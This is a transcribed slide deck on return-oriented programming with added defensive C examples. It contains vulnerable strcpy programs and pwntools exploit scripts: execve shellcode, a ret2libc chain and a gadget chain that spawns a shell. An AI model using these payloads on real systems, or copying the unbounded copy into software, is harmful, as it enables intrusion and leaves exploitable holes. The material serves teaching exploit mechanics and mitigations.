ROP and its friends
ROP and its friends, by Rakesh Paruchuri
CONTENTS
→ WHAT IS ROP
→ THE NEED FOR ROP
→ ROP vs RET2LIBC
→ FRIENDS
what is rop?
→ return oriented programming
→ take advantage of a buffer overflow
→ gain control over the instruction pointer
→ chain gadgets together
NEED FOR ROP
To exploit code we need:
→ code execution
→ overflow a buffer on the stack
→ get control over EIP
→ overwrite the saved return address
LET’S GIVE A TRY
```c
#include <stdio.h>
#include <string.h>   /* strcpy */

int main(int argc, char **argv)
{
    char buffer[50];
    strcpy(buffer, argv[1]);   /* unbounded copy: the overflow the slides exploit */
    return 0;
}
```
Exploit:
```python
from pwn import *

payload = ''
# execve("/bin/sh") shellcode, placed in the overflowed buffer
payload += '\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh'
payload += 'A' * 16            # padding up to the saved return address
payload += p32(0xffffd676)     # saved EIP overwritten with a stack address (executable stack, ASLR off)
print payload
```
Return To Libc
NX: a protection mechanism that marks the stack NOT EXECUTABLE. But we can still corrupt the stack and control EIP,
so why not point EIP at something that can already create a shell?
Return To Libc
→ assuming libc sits at a fixed address (ASLR OFF)
→ padding (“blah blah”) into the buffer to reach the saved EIP
→ overwriting the saved EIP with &system
→ supplying “/bin/sh” as the argument
LET’S GIVE A TRY
```c
#include <stdlib.h>
#include <string.h>   /* strcpy */

int main(int argc, char **argv)
{
    char buffer[50];
    strcpy(buffer, argv[1]);   /* same unbounded copy; the stack is now non-executable */
    return 0;
}
```
EXPLOIT
```python
from pwn import *

payload = ''
payload += 'A' * 54            # padding up to the saved return address
payload += p32(0xf7e48190)     # &system: the saved EIP now returns into libc
payload += 'BBBB'              # fake return address for system()
payload += p32(0xf7f68a24)     # &'/bin/sh': system()'s first argument
print payload
```
ROP
ASLR: a protection mechanism that randomizes the addresses of shared libraries and other virtual memory regions, so fixed libc addresses like the ones above stop working.
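The two mitigations the deck works around, NX (the Return To Libc slide above) and ASLR, are recorded in a binary's ELF headers: the PT_GNU_STACK program header carries the stack permissions, and an ET_DYN (position-independent) main image is what allows the loader to randomize its base. The C program below is an added example, not part of the slides or the author's material; it parses those two headers from an in-memory ELF64 image and reports both properties. The sample images are constructed in the code so it runs offline (to check a real binary you would read the file into the buffer); the struct definitions mirror the ELF64 specification rather than including <elf.h>, so the example also builds on non-Linux hosts.

```c
/* Added example (not from the slides): report NX and PIE from ELF64 headers.
 * Struct layouts follow the ELF64 specification; sample images are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ELF_MAGIC      "\x7f" "ELF"  /* split so 'E' is not read as a hex digit */
#define ELFCLASS64     2
#define ET_EXEC_T      2             /* fixed-address executable: its code is never relocated */
#define ET_DYN_T       3             /* position-independent: loader may randomize the base */
#define PT_GNU_STACK_T 0x6474e551    /* program header carrying the stack permissions */
#define PF_X_T         0x1
#define PF_W_T         0x2
#define PF_R_T         0x4

typedef struct {                       /* 64 bytes, same layout as Elf64_Ehdr */
    unsigned char e_ident[16];
    uint16_t e_type, e_machine;
    uint32_t e_version;
    uint64_t e_entry, e_phoff, e_shoff;
    uint32_t e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
} ehdr_t;

typedef struct {                       /* 56 bytes, same layout as Elf64_Phdr */
    uint32_t p_type, p_flags;
    uint64_t p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align;
} phdr_t;

struct mitigations {
    int valid;     /* 0 if the buffer is not a parsable ELF64 image */
    int pie;       /* 1 if ET_DYN: the main image itself can be randomized */
    int nx_stack;  /* 1 if PT_GNU_STACK is present and lacks PF_X */
};

struct mitigations inspect_elf64(const uint8_t *img, size_t len)
{
    struct mitigations m = {0, 0, 0};
    ehdr_t eh;
    if (len < sizeof eh) return m;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELF_MAGIC, 4) != 0 || eh.e_ident[4] != ELFCLASS64)
        return m;
    if (eh.e_phentsize != sizeof(phdr_t)) return m;
    /* Bounds-check the program header table before trusting e_phnum. */
    if (eh.e_phoff > len || (uint64_t)eh.e_phnum * sizeof(phdr_t) > len - eh.e_phoff)
        return m;
    m.valid = 1;
    m.pie = (eh.e_type == ET_DYN_T);
    /* A missing PT_GNU_STACK is reported as "not protected", as checksec does:
     * historical loaders gave such binaries an executable stack. */
    for (uint16_t i = 0; i < eh.e_phnum; i++) {
        phdr_t ph;
        memcpy(&ph, img + eh.e_phoff + (size_t)i * sizeof ph, sizeof ph);
        if (ph.p_type == PT_GNU_STACK_T) {
            m.nx_stack = (ph.p_flags & PF_X_T) == 0;
            break;
        }
    }
    return m;
}

/* Construct a minimal 120-byte ELF64 image: header plus one PT_GNU_STACK entry. */
size_t build_sample(uint8_t *out, int pie, uint32_t stack_flags)
{
    ehdr_t eh; phdr_t ph;
    memset(&eh, 0, sizeof eh); memset(&ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELF_MAGIC, 4);
    eh.e_ident[4] = ELFCLASS64;
    eh.e_ident[5] = 1;                      /* ELFDATA2LSB: little-endian */
    eh.e_type = pie ? ET_DYN_T : ET_EXEC_T;
    eh.e_machine = 62;                      /* EM_X86_64 */
    eh.e_ehsize = sizeof eh;
    eh.e_phoff = sizeof eh;
    eh.e_phentsize = sizeof ph;
    eh.e_phnum = 1;
    ph.p_type = PT_GNU_STACK_T;
    ph.p_flags = stack_flags;
    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, &ph, sizeof ph);
    return sizeof eh + sizeof ph;
}

/* Build a constructed sample and inspect it in one step. */
struct mitigations check_sample(int pie, uint32_t stack_flags)
{
    uint8_t img[sizeof(ehdr_t) + sizeof(phdr_t)];
    size_t n = build_sample(img, pie, stack_flags);
    return inspect_elf64(img, n);
}

int main(void)
{
    struct mitigations hard = check_sample(1, PF_R_T | PF_W_T);          /* PIE, RW stack */
    struct mitigations soft = check_sample(0, PF_R_T | PF_W_T | PF_X_T); /* fixed, RWX stack */
    printf("hardened: PIE=%d NX=%d\n", hard.pie, hard.nx_stack);
    printf("legacy:   PIE=%d NX=%d\n", soft.pie, soft.nx_stack);
    return 0;
}
```

This is the same information `readelf -l` and `checksec` print. Note that PIE only says the image can be relocated; whether it actually is depends on the kernel's `randomize_va_space` setting.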
What is rop??
→ return oriented programming
→ re-use pieces of code from the code segment
→ assemble those pieces into the desired shellcode
GADGETS
A gadget is any instruction sequence ending with a RET instruction.
ret = pop eip
EXAMPLE FOR GADGET
→ store several values in registers
→ you don’t lose control over EIP, because of the RET instruction at the end of the gadget
corresponding code for the gadget (pop rbx ; pop rbp ; pop r12 ; ret)
```python
payload += p64(0x401093)       # gadget address
payload += p64(rbx_value)      # popped into rbx   (placeholder value)
payload += p64(rbp_value)      # popped into rbp   (placeholder value)
payload += p64(r12_value)      # popped into r12   (placeholder value)
payload += p64(next_gadget)    # consumed by the gadget's ret: the next address to execute
```
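To see what the payload layout above does to the machine, here is an added C model, not code from the slides, of the gadget that layout feeds: it is assumed to be pop rbx ; pop rbp ; pop r12 ; ret at the slide's address 0x401093. The register values and the next-gadget address are constructed. The model only moves 64-bit words from an array into a struct and executes no machine code; it shows why "ret = pop eip" keeps control flowing, and also the failure mode where a truncated chain runs out of words.

```c
/* Added example (not from the slides): simulate how a pop/pop/pop/ret gadget
 * consumes the words a payload places on the stack. Nothing here runs code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum op { POP_RBX, POP_RBP, POP_R12, RET };

struct cpu {
    uint64_t rip, rbx, rbp, r12;
    const uint64_t *stack;   /* stack words, lowest address first */
    size_t rsp;              /* index of the word rsp points at */
    size_t nwords;           /* words available (length of the payload) */
};

#define GADGET_ADDR 0x401093ULL   /* the slide's gadget address */
static const enum op gadget_ops[] = { POP_RBX, POP_RBP, POP_R12, RET };

/* Pop the word at rsp; returns 0 if the chain runs off the end of the payload. */
static int pop_word(struct cpu *c, uint64_t *out)
{
    if (c->rsp >= c->nwords) return 0;
    *out = c->stack[c->rsp++];
    return 1;
}

/* Run one gadget: each pop moves a stack word into a register; the trailing
 * ret is "pop rip", which is what hands control to the next address. */
int run_gadget(struct cpu *c, const enum op *ops, size_t nops)
{
    for (size_t i = 0; i < nops; i++) {
        uint64_t w;
        if (!pop_word(c, &w)) return 0;
        switch (ops[i]) {
        case POP_RBX: c->rbx = w; break;
        case POP_RBP: c->rbp = w; break;
        case POP_R12: c->r12 = w; break;
        case RET:     c->rip = w; break;
        }
    }
    return 1;
}

/* Lay out the payload exactly as the slide does (p64 of each value, lowest
 * address first) and simulate the return into it. Returns 1 if the chain
 * reached next_gadget with all three registers loaded. */
int simulate_slide_chain(uint64_t rbx_val, uint64_t rbp_val, uint64_t r12_val,
                         uint64_t next_gadget, struct cpu *out)
{
    uint64_t payload[5] = { GADGET_ADDR, rbx_val, rbp_val, r12_val, next_gadget };
    struct cpu c;
    memset(&c, 0, sizeof c);
    c.stack = payload; c.nwords = 5; c.rsp = 0;

    /* The overwritten saved return address is consumed by the function's own
     * ret: rip becomes the gadget address and rsp moves to the first value. */
    if (!pop_word(&c, &c.rip) || c.rip != GADGET_ADDR) return 0;
    if (!run_gadget(&c, gadget_ops, 4)) return 0;
    c.stack = NULL; c.nwords = 0;     /* do not leak a pointer to the local array */
    if (out) *out = c;
    return c.rip == next_gadget && c.rsp == 5;
}

/* Failure mode: the gadget address is supplied but too few words follow it.
 * The pops run off the end, so control never reaches a next gadget. */
int simulate_truncated_chain(void)
{
    uint64_t payload[3] = { GADGET_ADDR, 0x11, 0x22 };   /* constructed */
    struct cpu c;
    memset(&c, 0, sizeof c);
    c.stack = payload; c.nwords = 3;
    if (!pop_word(&c, &c.rip)) return 0;
    return run_gadget(&c, gadget_ops, 4);   /* 0: nothing left to pop for r12/ret */
}

int main(void)
{
    struct cpu c;
    memset(&c, 0, sizeof c);
    /* Constructed register values and a constructed next-gadget address. */
    int ok = simulate_slide_chain(0x11, 0x22, 0x33, 0x402000, &c);
    printf("ok=%d rbx=%#llx rbp=%#llx r12=%#llx rip=%#llx words consumed=%zu\n",
           ok, (unsigned long long)c.rbx, (unsigned long long)c.rbp,
           (unsigned long long)c.r12, (unsigned long long)c.rip, c.rsp);
    printf("truncated chain completes: %d\n", simulate_truncated_chain());
    return 0;
}
```

Five words go in, five words are consumed: one by the victim's own ret, three by the pops, one by the gadget's ret. That last word is the only reason the chain continues, which is the point the "you don't lose control over EIP" bullet makes.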
LET’S GIVE A TRY
```c
#include <stdio.h>
#include <stdlib.h>   /* system */
#include <string.h>   /* strcpy */

static int flag;

void vuln_function1() { flag++; }
void vuln_function2() { if (flag == 1) system("/bin/sh"); }

int main(int argc, char **argv)
{
    char buf[50];
    strcpy(buf, argv[1]);   /* same unbounded copy as before */
    return 0;
}
```
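All three "let's give a try" programs share one defect: strcpy() copies argv[1] into a 50-byte stack buffer with no bound, which is what lets the input reach the saved return address. The C below is an added example, not from the slides, that keeps that pattern next to a bounded replacement which rejects oversized input, plus a helper that reports whether a given argument would overflow. The 54-character padding used in the slide exploits is one of the constructed inputs.

```c
/* Added example (not from the slides): the slides' unbounded strcpy() beside a
 * bounded copy that refuses input which would not fit. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 50   /* same buffer size as the slide programs */

/* The slide pattern, kept for comparison: strcpy() copies until it finds a
 * NUL in src, so 50 or more characters write past buffer[] into the saved
 * frame pointer and return address. */
void copy_arg_vulnerable(char *buffer, const char *src)
{
    strcpy(buffer, src);   /* no bound on the write */
}

/* 1 if strcpy() into a dst_size buffer would overflow (characters plus NUL). */
int strcpy_overflows(const char *src, size_t dst_size)
{
    return strlen(src) + 1 > dst_size;
}

/* Hardened replacement: copy only if the whole string, NUL included, fits.
 * memchr() stops after dst_size bytes, so it never reads past the end of a
 * source that long either. Returns 1 on success, 0 if rejected (dst untouched). */
int copy_arg_safe(char *dst, size_t dst_size, const char *src)
{
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL)       /* no terminator within dst_size bytes: too long */
        return 0;
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 1;
}

/* Does a BUF_SIZE buffer accept src under the hardened copy? */
int accepts_arg(const char *src)
{
    char buffer[BUF_SIZE];
    return copy_arg_safe(buffer, sizeof buffer, src);
}

/* Same check for a constructed input of n repeated characters, e.g. 'A'*54,
 * the padding length the slide exploits use. */
int accepts_repeated(char c, size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL) return 0;
    memset(s, c, n);
    s[n] = '\0';
    int ok = accepts_arg(s);
    free(s);
    return ok;
}

int main(int argc, char **argv)
{
    char buffer[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <arg>\n", argv[0]);
        return 1;
    }
    if (strcpy_overflows(argv[1], sizeof buffer))
        printf("strcpy() would write %zu bytes into a %d-byte buffer\n",
               strlen(argv[1]) + 1, BUF_SIZE);
    if (!copy_arg_safe(buffer, sizeof buffer, argv[1])) {
        fprintf(stderr, "argument too long (max %d characters)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("copied: %s\n", buffer);
    return 0;
}
```

Compiler-side mitigations catch the same bug without touching the source: building with -fstack-protector aborts on a clobbered canary before the corrupted return address is used, and -D_FORTIFY_SOURCE=2 at -O1 or higher replaces a strcpy() into a buffer of known size with a checked variant that aborts on overflow. Neither fixes the logic error, which is why the bounded copy is the actual fix.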
EXPLOIT
```python
from pwn import *

payload = ''
payload += "A" * 54            # padding up to the saved return address
payload += p32(0x0804844d)     # address of vuln_function1 (flag++)
payload += p32(0x08048536)     # gadget: pop ebx ; ret, reached when vuln_function1 returns
payload += p32(0xdeedbeef)     # junk word popped into ebx
payload += p32(0x0804845f)     # address of vuln_function2: flag == 1, so system("/bin/sh")
print payload
```
ROP vs RET2LIBC
(comparison table with columns RET2LIBC and ROP; the cell contents were not captured in this transcript)
SROP
→ fewer gadgets needed
→ build the shellcode by chaining system calls
→ attackers set up fake signal frames and initiate returns from signals that the kernel never delivered
exploiting rop: registers (stack diagram showing EIP and ESP; not captured in the transcript)
exploiting srop: registers (three slides of stack diagrams showing EIP and ESP; not captured in the transcript)
JIT-ROP
→ fine-grained address space layout randomization
→ offsets keep varying
→ requires an information leak
→ chaining of gadgets must be done at run time
→ executing shellcode on the stack
→ ret2libc
→ rop
→ srop & jit-rop